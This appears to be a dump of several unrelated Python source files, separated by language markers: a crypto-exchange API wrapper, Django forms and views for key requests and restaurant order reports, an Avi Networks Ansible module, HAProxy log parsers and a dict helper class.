deviceObj.expectHndl.send(command)
deviceObj.expectHndl.expect('#')
retBuffer += deviceObj.expectHndl.before
# Compile information to return
returnCls = opstestfw.returnStruct(returnCode=0,
buffer=retBuffer,
data=data_dict)
return returnCls
|
python
|
from pybithumb.core import *
from pandas import DataFrame
import pandas as pd
import datetime
import math
class Bithumb:
@staticmethod
def _convert_unit(unit):
try:
unit = math.floor(unit * 10000) / 10000
return unit
except:
return 0
@staticmethod
def get_tickers(payment_currency="KRW"):
"""
빗썸이 지원하는 암호화폐의 리스트
:param payment_currency : KRW
:return:
"""
resp = None
try:
resp = PublicApi.ticker("ALL", payment_currency)
data = resp['data']
tickers = [k for k, v in data.items() if isinstance(v, dict)]
return tickers
except Exception:
return resp
@staticmethod
def get_current_price(order_currency, payment_currency="KRW"):
"""
최종 체결 가격 조회
:param order_currency : BTC/ETH/DASH/LTC/ETC/XRP/BCH/XMR/ZEC/QTUM/BTG/EOS/ICX/VEN/TRX/ELF/MITH/MCO/OMG/KNC
:param payment_currency : KRW
:return : price
"""
resp = None
try:
resp = PublicApi.ticker(order_currency, payment_currency)
if order_currency != "ALL":
return float(resp['data']['closing_price'])
else:
del resp["data"]['date']
return resp["data"]
except Exception:
return resp
|
python
|
from django import forms
from django.forms.widgets import RadioSelect, CheckboxSelectMultiple
from django.forms import TypedChoiceField
from django.forms.models import inlineformset_factory
from django.utils.translation import ugettext_lazy as _
from keyform.models import Request, KeyData, Contact, KeyType
class CreateForm(forms.ModelForm):
class Meta:
model = Request
fields = ['building', 'student_name', 'bpn', 'reason_for_request', 'amt_received', 'payment_method', 'charge_amount', 'charged_on_rcr']
def __init__(self, *args, **kwargs):
super(CreateForm, self).__init__(*args, **kwargs)
# removes blank choices from Radio Select options
self.fields['payment_method'] = TypedChoiceField(widget=RadioSelect(), choices=Request.PAYMENT_TYPES, label=_("Paid by:"),
help_text=_("Cash/Check should only be accepted during camps and conferences, and also fill in the amount received. Use the Charge Amount box to charge to the student's account, or mark that the student was charged on the RCR if they are checking out."))
def clean(self):
cleaned_data = super(CreateForm, self).clean()
reason_for_request = cleaned_data.get("reason_for_request")
amt_received = cleaned_data.get("amt_received")
payment_method = cleaned_data.get("payment_method")
bpn = cleaned_data.get("bpn")
student_name = cleaned_data.get("student_name")
charge_amount = cleaned_data.get("charge_amount")
charged_on_rcr = cleaned_data.get("charged_on_rcr")
if reason_for_request == "lk":
if not bpn:
error_msg = _("Must have Bearpass Number when Lost/Stolen Key.")
self.add_error('bpn', error_msg)
if not student_name:
error_msg = _("Must have Student Name when Lost/Stolen Key.")
self.add_error('student_name', error_msg)
if amt_received <= 0 and charge_amount <= 0 and not charged_on_rcr:
error_msg = _("You must pick a billing method.")
self.add_error(None, error_msg)
error_msg = _("Choose one.")
self.add_error('amt_received', error_msg)
self.add_error('charge_amount', error_msg)
self.add_error('charged_on_rcr', error_msg)
if amt_received > 0 and payment_method == "na":
error_msg = _("If Amount Received is greater than zero, Payment Method must be selected.")
self.add_error('payment_method', error_msg)
if amt_received == 0 and payment_method != "na":
error_msg = _("If a Payment Method is selected, Amount Received cannot be zero.")
self.add_error('amt_received', error_msg)
return cleaned_data
class ContactForm(forms.ModelForm):
class Meta:
model = Contact
fields = ['name', 'email', 'buildings', 'alert_statuses']
widgets = {
'buildings': CheckboxSelectMultiple,
'alert_statuses': CheckboxSelectMultiple,
}
def clean_email(self):
email = self.cleaned_data.get('email')
return email.lower()
class EditForm(forms.ModelForm):
class Meta:
model = Request
fields = ['status']
class KeyDataForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(KeyDataForm, self).__init__(*args, **kwargs)
key_type_attrs = {
'data-pks_with_hide_core_number': ','.join([str(kt.pk) for kt in self.fields['key_type'].queryset if kt.hide_core_number]),
}
self.fields['key_type'].widget.attrs.update(key_type_attrs)
RequestFormSet = inlineformset_factory(Request, KeyData, form=KeyDataForm, extra=1, can_delete=False, exclude=[])
|
python
|
#!/usr/bin/python
# module_check: supported
# Avi Version: 17.1.1
# Copyright 2021 VMware, Inc. All rights reserved. VMware Confidential
# SPDX-License-Identifier: Apache License 2.0
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_healthmonitor
author: Gaurav Rastogi (@grastogi23) <[email protected]>
short_description: Module for setup of HealthMonitor Avi RESTful Object
description:
- This module is used to configure HealthMonitor object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
type: str
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
type: str
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete", "remove"]
type: str
avi_patch_path:
description:
- Patch path to use when using avi_api_update_method as patch.
type: str
avi_patch_value:
description:
- Patch value to use when using avi_api_update_method as patch.
type: str
allow_duplicate_monitors:
description:
- By default, multiple instances of the same healthmonitor to the same server are suppressed intelligently.
- In rare cases, the monitor may have specific constructs that go beyond the server keys (ip, port, etc.) during which such suppression is not
- desired.
- Use this knob to allow duplicates.
- Field introduced in 18.2.8.
- Allowed in basic(allowed values- true) edition, essentials(allowed values- true) edition, enterprise edition.
type: bool
authentication:
description:
- Authentication information for username/password.
- Field introduced in 20.1.1.
- Allowed in basic edition, essentials edition, enterprise edition.
type: dict
configpb_attributes:
description:
- Protobuf versioning for config pbs.
- Field introduced in 21.1.1.
type: dict
description:
description:
- User defined description for the object.
type: str
disable_quickstart:
description:
- During addition of a server or healthmonitors or during bootup, avi performs sequential health checks rather than waiting for send-interval to
- kick in, to mark the server up as soon as possible.
- This knob may be used to turn this feature off.
- Field introduced in 18.2.7.
- Allowed in basic(allowed values- false) edition, essentials(allowed values- false) edition, enterprise edition.
type: bool
dns_monitor:
description:
- Healthmonitordns settings for healthmonitor.
type: dict
external_monitor:
description:
- Healthmonitorexternal settings for healthmonitor.
type: dict
failed_checks:
description:
- Number of continuous failed health checks before the server is marked down.
- Allowed values are 1-50.
- Default value when not specified in API or module is interpreted by Avi Controller as 2.
type: int
http_monitor:
description:
- Healthmonitorhttp settings for healthmonitor.
type: dict
https_monitor:
description:
- Healthmonitorhttp settings for healthmonitor.
type: dict
imap_monitor:
description:
- Health monitor for imap.
- Field introduced in 21.1.1.
type: dict
imaps_monitor:
description:
- Health monitor for imaps.
- Field introduced in 21.1.1.
type: dict
is_federated:
description:
- This field describes the object's replication scope.
- If the field is set to false, then the object is visible within the controller-cluster and its associated service-engines.
- If the field is set to true, then the object is replicated across the federation.
- Field introduced in 17.1.3.
- Allowed in basic(allowed values- false) edition, essentials(allowed values- false) edition, enterprise edition.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.4"
type: bool
markers:
description:
- List of labels to be used for granular rbac.
- Field introduced in 20.1.5.
- Allowed in basic edition, essentials edition, enterprise edition.
type: list
monitor_port:
description:
- Use this port instead of the port defined for the server in the pool.
- If the monitor succeeds to this port, the load balanced traffic will still be sent to the port of the server defined within the pool.
- Allowed values are 1-65535.
- Special values are 0 - 'use server port'.
type: int
name:
description:
- A user friendly name for this health monitor.
required: true
type: str
pop3_monitor:
description:
- Health monitor for pop3.
- Field introduced in 21.1.1.
type: dict
pop3s_monitor:
description:
- Health monitor for pop3s.
- Field introduced in 21.1.1.
type: dict
radius_monitor:
description:
- Health monitor for radius.
- Field introduced in 18.2.3.
- Allowed in basic edition, essentials edition, enterprise edition.
version_added: "2.9"
type: dict
receive_timeout:
description:
- A valid response from the server is expected within the receive timeout window.
- This timeout must be less than the send interval.
- If server status is regularly flapping up and down, consider increasing this value.
- Allowed values are 1-2400.
- Unit is sec.
- Default value when not specified in API or module is interpreted by Avi Controller as 4.
type: int
send_interval:
description:
- Frequency, in seconds, that monitors are sent to a server.
- Allowed values are 1-3600.
- Unit is sec.
- Default value when not specified in API or module is interpreted by Avi Controller as 10.
type: int
sip_monitor:
description:
- Health monitor for sip.
- Field introduced in 17.2.8, 18.1.3, 18.2.1.
- Allowed in basic edition, essentials edition, enterprise edition.
version_added: "2.9"
type: dict
smtp_monitor:
description:
- Health monitor for smtp.
- Field introduced in 21.1.1.
type: dict
smtps_monitor:
description:
- Health monitor for smtps.
- Field introduced in 21.1.1.
type: dict
successful_checks:
description:
- Number of continuous successful health checks before server is marked up.
- Allowed values are 1-50.
- Default value when not specified in API or module is interpreted by Avi Controller as 2.
type: int
tcp_monitor:
description:
- Healthmonitortcp settings for healthmonitor.
type: dict
tenant_ref:
description:
- It is a reference to an object of type tenant.
type: str
type:
description:
- Type of the health monitor.
- Enum options - HEALTH_MONITOR_PING, HEALTH_MONITOR_TCP, HEALTH_MONITOR_HTTP, HEALTH_MONITOR_HTTPS, HEALTH_MONITOR_EXTERNAL, HEALTH_MONITOR_UDP,
- HEALTH_MONITOR_DNS, HEALTH_MONITOR_GSLB, HEALTH_MONITOR_SIP, HEALTH_MONITOR_RADIUS, HEALTH_MONITOR_SMTP, HEALTH_MONITOR_SMTPS,
- HEALTH_MONITOR_POP3, HEALTH_MONITOR_POP3S, HEALTH_MONITOR_IMAP, HEALTH_MONITOR_IMAPS.
- Allowed in basic(allowed values- health_monitor_ping,health_monitor_tcp,health_monitor_udp,health_monitor_http,health_monitor_https) edition,
- essentials(allowed values- health_monitor_ping,health_monitor_tcp,health_monitor_udp) edition, enterprise edition.
required: true
type: str
udp_monitor:
description:
- Healthmonitorudp settings for healthmonitor.
type: dict
url:
description:
- Avi controller URL of the object.
type: str
uuid:
description:
- Uuid of the health monitor.
type: str
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- hosts: all
vars:
avi_credentials:
username: "admin"
password: "something"
controller: "192.168.15.18"
api_version: "21.1.1"
- name: Create a HTTPS health monitor
avi_healthmonitor:
avi_credentials: "{{ avi_credentials }}"
https_monitor:
http_request: HEAD / HTTP/1.0
http_response_code:
- HTTP_2XX
- HTTP_3XX
receive_timeout: 4
failed_checks: 3
send_interval: 10
successful_checks: 3
type: HEALTH_MONITOR_HTTPS
name: MyWebsite-HTTPS
"""
RETURN = '''
obj:
description: HealthMonitor (api/healthmonitor) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from avi.sdk.utils.ansible_utils import avi_common_argument_spec
from avi.sdk.utils.ansible_utils import (
avi_ansible_api, avi_common_argument_spec)
HAS_AVI = True
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete', 'remove']),
avi_patch_path=dict(type='str',),
avi_patch_value=dict(type='str',),
allow_duplicate_monitors=dict(type='bool',),
authentication=dict(type='dict',),
configpb_attributes=dict(type='dict',),
description=dict(type='str',),
disable_quickstart=dict(type='bool',),
dns_monitor=dict(type='dict',),
external_monitor=dict(type='dict',),
failed_checks=dict(type='int',),
http_monitor=dict(type='dict',),
https_monitor=dict(type='dict',),
imap_monitor=dict(type='dict',),
imaps_monitor=dict(type='dict',),
is_federated=dict(type='bool',),
markers=dict(type='list',),
monitor_port=dict(type='int',),
name=dict(type='str', required=True),
pop3_monitor=dict(type='dict',),
pop3s_monitor=dict(type='dict',),
radius_monitor=dict(type='dict',),
receive_timeout=dict(type='int',),
send_interval=dict(type='int',),
sip_monitor=dict(type='dict',),
smtp_monitor=dict(type='dict',),
smtps_monitor=dict(type='dict',),
successful_checks=dict(type='int',),
tcp_monitor=dict(type='dict',),
tenant_ref=dict(type='str',),
type=dict(type='str', required=True),
udp_monitor=dict(type='dict',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) or requests is not installed. '
'For more details visit https://github.com/vmware/alb-sdk.'))
return avi_ansible_api(module, 'healthmonitor',
set())
if __name__ == '__main__':
main()
|
python
|
from .api import NasapiError, Nasapi #noqa
|
python
|
import sys
from people_flow import YOLO
from people_flow import detect_video
if __name__ == '__main__':
video_path = 'test1.MP4'
output_path='human_counter-master'
detect_video(YOLO(), video_path, output_path)
print('sun')
|
python
|
from .routes import Tesseract_OCR_BLUEPRINT
from .routes import Tesseract_OCR_BLUEPRINT_WF
#from .documentstructure import DOCUMENTSTRUCTURE_BLUEPRINT
|
python
|
# Copyright 2009-2013 Eucalyptus Systems, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
# Please contact Eucalyptus Systems, Inc., 6755 Hollister Ave., Goleta
# CA 93117, USA or visit http://www.eucalyptus.com/licenses/ if you need
# additional information or have any questions.
import servo
from datetime import datetime as dt
class HaproxyLog(object):
def __init__(self):
self.timestamp = None #timestamp
self.elb = None #name of the loadbalancer
self.client_ip = None
self.client_port = None
self.backend_ip = None
self.backend_port = None
self.received_bytes = None
self.sent_bytes = None
def get_latency(self): # in milliseconds
raise NotImplementedError()
def get_request_count(self):
raise NotImplementedError()
def get_status_code(self):
raise NotImplementedError()
def is_backend_code(self):
raise NotImplementedError()
class HttpLog(HaproxyLog):
def __init__(self, frontend_name=None, backend_name=None, server_name=None, status_code=200, term_state='--', Tq=0, Tw=0, Tc=0, Tr=0, Tt=0):
self.frontend_name = frontend_name
self.backend_name = backend_name
self.server_name = server_name
self.status_code = status_code
self.term_state = term_state
self.Tq = Tq #the total time in milliseconds spent waiting for the client to send a full HTTP request
self.Tw = Tw #total time in milliseconds spent waiting in the various queues.
self.Tc = Tc #total time in milliseconds spent waiting for the connection to establish to the final server, including retries
self.Tr = Tr #total time in milliseconds spent waiting for the server to send a full HTTP response
self.Tt = Tt # total time in milliseconds elapsed between the accept and the last close
def get_latency(self):
return self.Tr
def get_request_count(self):
return 1
def get_status_code(self):
return int(self.status_code)
def is_backend_code(self):
# TODO: SPARK: more sophisticated logic to classify the termination state would be needed
# any session who's termination state is not '--' represents that the haproxy detected error with the session and
# sent the http status code accordingly to the client
if self.term_state == '--':
return True
else:
return False
@staticmethod
def parse(line):
# self.__content_map[section_name].append('logformat httplog\ %f\ %b\ %s\ %ST\ %ts\ %Tq\ %Tw\ %Tc\ %Tr\ %Tt')
token = line.split(' ')
if len(token) == 11:
log = HttpLog()
log.frontend_name = token[1]
log.backend_name = token[2]
log.server_name = token[3]
log.status_code = int(token[4])
log.term_state = token[5]
log.Tq = int(token[6])
log.Tw = int(token[7])
log.Tc = int(token[8])
log.Tr = int(token[9])
log.Tt = int(token[10])
return log
raise Exception()
@staticmethod
def log_format():
return 'httplog\ %f\ %b\ %s\ %ST\ %ts\ %Tq\ %Tw\ %Tc\ %Tr\ %Tt'
def __str__(self):
return 'httplog-%s-%s-%s-%d-%s-%d-%d-%d-%d-%d' % (self.frontend_name, self.backend_name, self.server_name, self.status_code, self.term_state, self.Tq, self.Tw, self.Tc, self.Tr, self.Tt)
def __repr__(self):
return __str__(self)
class HttpAccessLog (HttpLog):
def __init__(self, loadbalancer=None):
self.elb = loadbalancer
self.elb_status_code = 200
self.backend_status_code = -1
self.http_request = None
self.user_agent = None
# getters compute ELB-specific time metrics using the Haproxy metrics
def request_processing_time(self):
try:
return '%.6f' % ((self.Tw + self.Tc)/1000.0)
except Exception,err:
return '-1'
def backend_processing_time(self):
try:
return '%.6f' % (self.Tr/1000.0)
except Exception,err:
return '-1'
def response_processing_time(self):
return '-1'
def request_str(self):
return self.http_request
def iso_timestamp(self):
logt = dt.utcfromtimestamp(float(self.timestamp))
return logt.isoformat()
def access_log(self):
# timestamp elb client:port backend:port request_processing_time backend_processing_time response_processing_time elb_status_code backend_status_code received_bytes sent_bytes request
return '%s %s %s:%s %s:%s %s %s %s %d %d %d %d \"%s\" \"%s\"' % (self.iso_timestamp(), self.elb, self.client_ip, self.client_port, self.backend_ip, self.backend_port, self.request_processing_time(), self.backend_processing_time(), self.response_processing_time(), self.elb_status_code, self.backend_status_code, self.received_bytes, self.sent_bytes, self.request_str(),self.user_agent)
@staticmethod
def log_format():
return 'httplog\ %Ts\ %ci\ %cp\ %si\ %sp\ %Tq\ %Tw\ %Tc\ %Tr\ %Tt\ %ST\ %U\ %B\ %f\ %b\ %s\ %ts\ %r\ %hrl'
@staticmethod
def parse(line, loadbalancer=None):
token = line.split(' ')
if len(token) >= len(HttpAccessLog.log_format().split(' ')):
log = HttpAccessLog(loadbalancer)
log.timestamp = token[1]
log.client_ip = token[2]
log.client_port = token[3]
log.backend_ip = token[4]
log.backend_port = token[5]
log.Tq = int(token[6])
log.Tw = int(token[7])
log.Tc = int(token[8])
log.Tr = int(token[9])
log.Tt = int(token[10])
log.elb_status_code = int(token[11])
log.status_code = log.elb_status_code
log.received_bytes = int(token[12])
log.sent_bytes = int(token[13])
log.frontend_name = token[14]
log.backend_name = token[15]
log.server_name = token[16]
log.term_state = token[17]
log.http_request = ' '.join(token[18:21]) # 3 tuple HTTP request
log.user_agent = ' '.join(token[21:]) # Rest of line
return log
raise Exception('line: %s, # tokens: %d' % (line, len(token)))
class TcpLog(HaproxyLog):
def __init__(self, frontend_name=None, backend_name=None, server_name=None, term_state='--', Tw=0, Tc=0, Tt=0):
self.frontend_name = frontend_name
self.backend_name = backend_name
self.server_name = server_name
self.term_state = term_state
self.Tw = Tw #total time in milliseconds spent waiting in the various queues.
self.Tc = Tc #total time in milliseconds spent waiting for the connection to establish to the final server, including retries
self.Tt = Tt # total time in milliseconds elapsed between the accept and the last close
def get_latency(self): # in milliseconds
return self.Tt
def get_request_count(self):
return 1
def get_status_code(self):
return 0 # irrelevant
def is_backend_code(self):
return True #irrelevant
@staticmethod
def parse(line):
# self.__content_map[section_name].append('log-format tcplog\ %f\ %b\ %s\ %ts\ %Tw\ %Tc\ %Tt')
token = line.split(' ')
if len(token) == 8:
log = TcpLog()
log.frontend_name = token[1]
log.backend_name = token[2]
log.server_name = token[3]
log.term_state = token[4]
log.Tw = int(token[5])
log.Tc = int(token[6])
log.Tt = int(token[7])
return log
raise Exception()
@staticmethod
def log_format():
return 'tcplog\ %f\ %b\ %s\ %ts\ %Tw\ %Tc\ %Tt'
def __str__(self):
return 'tcplog-%s-%s-%s-%s-%d-%d-%d' % (self.frontend_name, self.backend_name, self.server_name, self.term_state, self.Tw, self.Tc, self.Tt)
def __repr__(self):
return __str__(self)
class TcpAccessLog(TcpLog):
def __init__(self, loadbalancer=None):
self.elb = loadbalancer
self.elb_status_code = -1
self.backend_status_code = -1
self.http_request = 'NA'
def request_processing_time(self):
try:
return '%.6f' % ((self.Tw + self.Tc)/1000.0)
except Exception, err:
return '-1'
def backend_processing_time(self):
return '-1'
def response_processing_time(self):
return '-1'
def iso_timestamp(self):
logt = dt.utcfromtimestamp(float(self.timestamp))
return logt.isoformat()
def access_log(self):
# timestamp elb client:port backend:port request_processing_time backend_processing_time response_processing_time elb_status_code backend_status_code received_bytes sent_bytes request
return '%s %s %s:%s %s:%s %s %s %s %d %d %d %d' % (self.iso_timestamp(), self.elb, self.client_ip, self.client_port, self.backend_ip, self.backend_port, self.request_processing_time(), self.backend_processing_time(), self.response_processing_time(), self.elb_status_code, self.backend_status_code, self.received_bytes, self.sent_bytes)
@staticmethod
def log_format():
return 'tcplog\ %Ts\ %ci\ %cp\ %si\ %sp\ %Tw\ %Tc\ %Tt\ %U\ %B\ %f\ %b\ %s\ %ts'
@staticmethod
def parse(line, loadbalancer=None):
token = line.split(' ')
if len(token) == len(TcpAccessLog.log_format().split(' ')):
log = TcpAccessLog(loadbalancer)
log.timestamp = token[1]
log.client_ip = token[2]
log.client_port = token[3]
log.backend_ip = token[4]
log.backend_port = token[5]
log.Tw = int(token[6])
log.Tc = int(token[7])
log.Tt = int(token[8])
log.received_bytes = int(token[9])
log.sent_bytes = int(token[10])
log.frontend_name = token[11]
log.backend_name = token[12]
log.server_name = token[13]
log.term_state = token[14]
return log
raise Exception('line: %s, # tokens: %d' % (line, len(token)))
|
python
|
import json5
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.utils import timezone
from home.models import SiparisKayitlari, Masa
from kullanici.models import Profil
from menu.models import Menu
import datetime
@login_required(login_url="/login/")
def kayitlar(request):
masalar = Masa.objects.all()
user = Profil.objects.filter(user=request.user)
bilgiler=[]
if user:
bilgiler = user[0]
context = {
"masa": masalar,
"bilgi": bilgiler,
"link": "/kayitlar/masalar/masa/",
"title": "Geçmiş Masa Kayıtları"
}
return render(request, "gecmis_kayitlar.html", context)
@login_required(login_url="/login/")
def z_raporu(request):
masalar = Masa.objects.all()
user = Profil.objects.filter(user=request.user)
bilgiler=[]
if user:
bilgiler = user[0]
context = {
"masa": masalar,
"bilgi": bilgiler,
"link": "/kayitlar/z-raporu/",
"title": "Z Raporu"
}
return render(request, "gecmis_kayitlar.html", context)
@login_required(login_url="/login/")
def z_rapor_kaydi(request, masa_no):
masa = Masa.objects.get(masa_no=masa_no)
kayilar = SiparisKayitlari.objects.filter(masa_no=masa_no, siparis_zamani__day=timezone.now().day,siparis_zamani__month=timezone.now().month,siparis_zamani__year=timezone.now().year)
menu = Menu.objects.all()
bilgiler=[]
user = Profil.objects.filter(user=request.user)
if user:
bilgiler = user[0]
context = {
"masa": masa,
"kayitlar": kayilar,
"menu": menu,
"bilgi": bilgiler
}
list = {}
tum_list={}
toplam_para=0
toplam_musteri=0
for i in kayilar:
toplam_para+=i.toplam_ucret
toplam_musteri+=i.kisi_sayisi
kayit = json5.loads(i.siparis_list)
for k in kayit.keys():
for m in menu:
if int(k) == m.id:
if not m.urun_adi in list:
list[m.urun_adi] = [kayit[k], m.fiyat]
else:
temp = list.get(m.urun_adi)
list[m.urun_adi] = [temp[0] + kayit[k], m.fiyat]
toplam_urun=0
for i in list:
sayi=list[i][0]
toplam_urun+=sayi
fiyat=list[i][1]
tum_list[i]=[sayi,sayi*fiyat]
context["list"]=tum_list
context["toplam_para"]=toplam_para
context["toplam_urun"]=toplam_urun
context["toplam_musteri"]=toplam_musteri
return render(request, "z-rapor-view.html", context)
@login_required(login_url="/login/")
def gunluk_z_raporu(request):
kayilar = SiparisKayitlari.objects.filter(siparis_zamani__day=timezone.now().day)
menu = Menu.objects.all()
bilgiler=[]
user = Profil.objects.filter(user=request.user)
if user:
bilgiler = user[0]
context = {
"kayitlar": kayilar,
"menu": menu,
"bilgi": bilgiler
}
list = {}
tum_list={}
toplam_para=0
toplam_musteri=0
for i in kayilar:
toplam_para+=i.toplam_ucret
toplam_musteri+=i.kisi_sayisi
kayit = json5.loads(i.siparis_list)
for k in kayit.keys():
for m in menu:
if int(k) == m.id:
if not m.urun_adi in list:
list[m.urun_adi] = [kayit[k], m.fiyat]
else:
temp = list.get(m.urun_adi)
list[m.urun_adi] = [temp[0] + kayit[k], m.fiyat]
toplam_urun=0
for i in list:
sayi=list[i][0]
toplam_urun+=sayi
fiyat=list[i][1]
tum_list[i]=[sayi,sayi*fiyat]
context["list"]=tum_list
context["toplam_para"]=toplam_para
context["toplam_urun"]=toplam_urun
context["toplam_musteri"]=toplam_musteri
return render(request,"gunluk-z-raporu.html",context)
@login_required(login_url="/login/")
def masa_kaydi(request, masa_no):
masa = Masa.objects.get(masa_no=masa_no)
menu = Menu.objects.all()
user = Profil.objects.filter(user=request.user)
bilgiler=[]
if user:
bilgiler = user[0]
context = {
"masa": masa,
"menu": menu,
"bilgi": bilgiler
}
if request.GET.get("filtreleme_turu", None) == "basic":
tur = request.GET.get("tur", None)
if tur == "Günlük":
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no,
siparis_zamani__day=timezone.now().day,
siparis_zamani__month=timezone.now().month,
siparis_zamani__year=timezone.now().year).order_by("-id")
elif tur == "Haftalık":
one_week_ago = timezone.now().today() - timezone.timedelta(days=7)
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no, siparis_zamani__gte=one_week_ago,siparis_zamani__month=timezone.now().month,siparis_zamani__year=timezone.now().year).order_by(
"-id")
elif tur == "Aylık":
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no,
siparis_zamani__month=timezone.now().month,siparis_zamani__year=timezone.now().year).order_by("-id")
else:
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no).order_by("-id")
context["kayitlar"] = kayitlar
elif request.GET.get("filtreleme_turu", None) == "belirli":
tarih = request.GET.get("tarih", None)
date = datetime.datetime.strptime(tarih, '%Y-%m-%d')
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no, siparis_zamani__day=date.day,siparis_zamani__month=timezone.now().month,siparis_zamani__year=timezone.now().year).order_by("-id")
context["kayitlar"] = kayitlar
elif request.GET.get("filtreleme_turu", None) == "aralık":
baslangic = request.GET.get("baslangic", None)
bitis = request.GET.get("bitis", None)
date_baslangic = datetime.datetime.strptime(baslangic, '%Y-%m-%d')
date_bitis = datetime.datetime.strptime(bitis, '%Y-%m-%d') + timezone.timedelta(days=1)
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no, siparis_zamani__gte=date_baslangic,
siparis_zamani__lte=date_bitis).order_by("-id")
context["kayitlar"] = kayitlar
else:
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no).order_by("-id")
context["kayitlar"] = kayitlar
return render(request, "masa_kayit_view.html", context)
|
python
|
from django.shortcuts import render
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Product,Denomination, Order, OrderItem
from end_users import serializers
# Create your views here.
""" All Product related APIs here"""
class ProductApiView(APIView):
serializer_class = serializers.ProductSerializer
""" return all available products"""
def get(self, request, format=None):
""" return all available products"""
products = Product.objects.all()
serializer = self.serializer_class(products, many=True)
return Response({'status':'success', 'response':serializer.data})
""" Create new products"""
def post(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
prod_saved = serializer.save()
return Response({"success": "Product '{}' created successfully".format(prod_saved.name)})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
""" Delete specified product"""
def delete(self, request):
products = Product.objects.all().delete()
return Response({'status':'success', 'response':'Deleted Successfully'})
""" All denomination APIs here"""
class DenominationApiView(APIView):
serializer_class = serializers.DenominationSerializer
""" return all available denominatios"""
def get(self, request, format=None):
""" return all available products"""
denominations = Denomination.objects.all()
serializer = self.serializer_class(denominations, many=True)
return Response({'status':'success', 'response':serializer.data})
""" Create new Denomination"""
def post(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
denomination_saved = serializer.save()
return Response({"success": "Denomination '{}' created successfully".format(denomination_saved.val)})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
""" Delete all Denominations"""
def delete(self, request):
denominations = Denomination.objects.all().delete()
return Response({'status':'success', 'response':'Deleted Successfully'})
""" All Order APIs here"""
class OrderApiView(APIView):
serializer_class = serializers.OrderSerializer
""" get placed order details"""
def get(self, request, format=None):
# import pdb; pdb.set_trace()
orders = Order.objects.all()
serializer = self.serializer_class(orders, many=True)
return Response({'status':'success', 'response':serializer.data})
""" Place new order """
def post(self, request):
""" place order"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
order_saved = serializer.save()
return Response({"success": "Order '{}' created successfully".format(order_saved.Date)})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
""" Delete all Orders"""
def delete(self, request):
orders = Order.objects.all().delete()
return Response({'status':'success', 'response':'Deleted Successfully'})
|
python
|
"""
Contains some helper functions and classes.
"""
import os
import shutil
import typing as t
class attrdict(dict):
"""
Sub-class like python dict with support for I/O like attr.
>>> profile = attrdict({
'languages': ['python', 'cpp', 'javascript', 'c'],
'nickname': 'doge gui',
'age': 23
})
>>> profile.languages.append('Russian') # Add language to profile
>>> profile.languages
['python', 'cpp', 'javascript', 'c', 'Russian']
>>> profile.age == 23
True
Attribute-like key should not be methods with dict, and obey python syntax:
>>> profile.1 = 0
Traceback (most recent call last):
...
SyntaxError: invalid syntax
>>> profile.popitem = None # Rewrite
"""
def __setattr__(self, name: str, value: t.Any) -> None:
if name in dir(dict):
super().__setattr__(name, value)
else:
super().__setitem__(name, value)
def __getattribute__(self, name: str) -> t.Any:
if name in dir(dict):
return super().__getattribute__(name)
return super().__getitem__(name)
class staticdict(attrdict):
"""
staticdict inherit all behaviors from attrdict but banned all writing operations on it.
>>> final = staticdict({
'loaded': False,
'config': './carental/config.py'
})
>>> not final.loaded is True
True
>>> final.brand = 'new'
Traceback (most recent call last):
...
RuntimeError: cannot set value on staticdict
"""
def __setattr__(self, _key: str, _value: object) -> t.NoReturn:
if _key in dir(dict):
super().__setattr__(_key, _value)
raise RuntimeError('cannot set value on staticdict')
def __delattr__(self, _key: str):
raise RuntimeError('cannot delete value on staticdict')
_T = t.TypeVar('_T')
class property_(t.Generic[_T]):
"""
A one line ``property`` decorator to support reading class attributes with prefix.
Here is a sub-class inherit from dict which support it,
by using ``__getattr__``, ``__setattr__``, and ``__delattr__``.
When we want to declare a property inside class, we always doing this:
>>> class Bar:
def __init__(self, size: int, count: int) -> None:
self._size = size
self._count = count
@property
def size(self) -> int:
return self._size
@property
def count(self) -> int:
return self._count
Obviously its sth like redundancy, by using this ``property_`` function we could:
>>> class AnotherBar(Bar):
size = property_('size', type_=int)
